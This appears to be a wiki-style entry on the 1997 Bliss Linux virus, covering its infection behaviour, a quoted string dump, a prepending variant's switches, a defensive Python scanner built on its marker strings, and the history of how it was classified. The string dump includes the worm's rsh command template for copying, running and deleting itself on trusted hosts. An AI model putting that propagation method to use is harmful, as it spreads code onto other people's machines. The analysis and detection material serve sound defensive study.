Bliss | |
---|---|
Type | File virus |
Creator | "electric eel" |
Date Discovered | 1997.01.31 |
Place of Origin | |
Source Language | |
Platform | Linux |
File Type(s) | ELF executables |
Infection Length | 17,892 bytes |
Reported Costs | |
Bliss is the second Linux virus. Its classification was controversial, with some people calling it a trojan, others a worm, and most calling it a virus.
Behavior
When executed, Bliss looks for ELF executables to which it has write access. When it finds one, it overwrites the file, so the file's functionality is partially or completely lost. It also creates the directory /tmp/.bliss, where it stores some system binaries. It looks for other machines to infect by reading the /etc/hosts.equiv file, a file on Linux and most other Unix-based systems that lists other computers on the network that are trusted. Bliss will remove itself if an infected file is executed with the --bliss-disinfect-files-please switch.
The virus contains the following text:
dedicated to rkd
infected by bliss
skipping, infected with same vers or different type
replacing older version
replacing ourselves with newer version
infect() returning success
successfully (i hope) disinfected
rsh%s%s %s 'cat>%s;chmod 777 %s;%s;rm -f %s'
doing do_worm_stuff()
/etc/hosts.equiv
Compiled on Sep 28 1996 at 22:24:03
Written by electric eel.
help? hah! read the source!
bliss was run %d sex ago, rep_wait=%d
/usr/spool/news
GCC: (GNU) 2.7.2.l.2
Variants
There was a second variant of Bliss that is 18,604 bytes long. It is a prepender rather than an overwriter. When the file is executed, the original program is extracted to the /tmp directory under a name built from the process ID with the prefix ".bliss-tmp." added to it. Infected files run correctly, though shell scripts may complain about them. It uses the /tmp/.bliss directory to clean up infected files if the correct command is issued. When files are executed with the argument --bliss-, the user may choose between these relatively self-descriptive options:
- uninfect-files-please, disinfect-files-please
- dont-run-original, just-run-bliss, just-run-virus
- dont-run-virus, dont-run-bliss, just-run-original
- force-worm-stuff
- exec
- infect-file <file-list>
- version
- help
It also checks the following directories for executables:
- $HOME/bin
- $PATH
- each getpwent()/bin
- /usr/spool/news
- /var/spool/news
- /dos
- /proc
- /cdrom
- /
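A defender-side check built from the indicators the two sections above give (the marker strings in the string dump, the /tmp/.bliss directory, and the prepender layout in which the 18,604-byte image sits ahead of the original ELF). This is an added example, not code from the wiki or from any antivirus vendor; the marker list and the "second ELF magic at the variant's length" rule are hypothetical heuristics, and the sample file built by build_sample_prepended is a constructed stand-in, not the virus.

```python
import os

ELF_MAGIC = b"\x7fELF"
# Strings quoted from the virus on this page; a hypothetical heuristic, not a vendor signature
BLISS_MARKERS = [b"infected by bliss", b"Written by electric eel.", b"doing do_worm_stuff()"]
PREPENDER_IMAGE_LEN = 18604  # reported length of the prepending variant


def scan_bytes(data: bytes) -> dict:
    """Heuristic check of one file image. The prepender keeps the host's ELF header
    intact right after its own image, so a second ELF magic at exactly that offset is a hint."""
    result = {"elf": data.startswith(ELF_MAGIC), "markers": [],
              "second_elf_at": None, "suspicious": False}
    if not result["elf"]:
        return result
    result["markers"] = [m.decode() for m in BLISS_MARKERS if m in data]
    second = data.find(ELF_MAGIC, 1)
    result["second_elf_at"] = second if second != -1 else None
    result["suspicious"] = bool(result["markers"]) or second == PREPENDER_IMAGE_LEN
    return result


def scan_file(path: str) -> dict:
    with open(path, "rb") as f:
        return scan_bytes(f.read())


def scan_tree(root: str):
    """Yield (path, result) for suspicious regular files under root; symlinks are skipped."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            try:
                res = scan_file(path)
            except OSError:
                continue
            if res["suspicious"]:
                yield path, res


def bliss_tmp_dir_present(tmp: str = "/tmp") -> bool:
    """Both variants create /tmp/.bliss; its presence is an indicator on its own."""
    return os.path.isdir(os.path.join(tmp, ".bliss"))


def build_sample_prepended(image_len: int = PREPENDER_IMAGE_LEN) -> bytes:
    """Constructed stand-in for a prepender-infected file (not real virus code)."""
    head = ELF_MAGIC + b"\0infected by bliss\0Written by electric eel.\0"
    image = head + b"\0" * (image_len - len(head))  # zero-padded 'virus' image
    host = ELF_MAGIC + b"\0" * 60 + b"original host program\0"  # original ELF follows
    return image + host
```

Running scan_tree over the directories the variant itself searches (listed above) is the natural sweep; a second ELF magic can also occur in legitimate binaries that embed other ELF images, which is why the exact-offset rule is combined with the strings.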
History
An "alpha" version of Bliss is known to have existed as far back as the 29th of September 1996, when its code was posted to comp.security.unix, alt.comp.virus and comp.os.linux.misc. The first reported binary infection was on the 31st of January 1997. On the 5th of February, the creator posted to comp.security.unix that he was concerned that his creation might be loose. McAfee Antivirus claimed credit for discovering the virus on the same day, and the press ran with that story, though McAfee had actually received the information from the Linux Security mailing list.
While today it seems to be generally agreed that Bliss is a virus, its classification was a source of controversy when it came out. Devotees of a platform known for its security (particularly when compared to Microsoft Windows) will often claim that a certain piece of malware is something different from what others report it as, as in the argument over the classification of the Oompa worm. One analyst pointed to the fact that the user has to run the program (as root, no less) for it to spread as proof that it is a trojan. Proponents of the virus classification cite the fact that it spreads at all as evidence that it is a virus. Others thought it was a worm, as it could spread over networks. Our own classification is virus, since it spreads and does so with some sort of parasitic relationship to programs, regardless of how much user involvement there is or whether or not it can spread over a network.
Sources
Mikko Hypponen. F-Secure Antivirus, F-Secure Virus Descriptions: Linux/Bliss.
University of Paderborn. Bliss, a Linux "virus" (including links on the Paderborn site), 1997.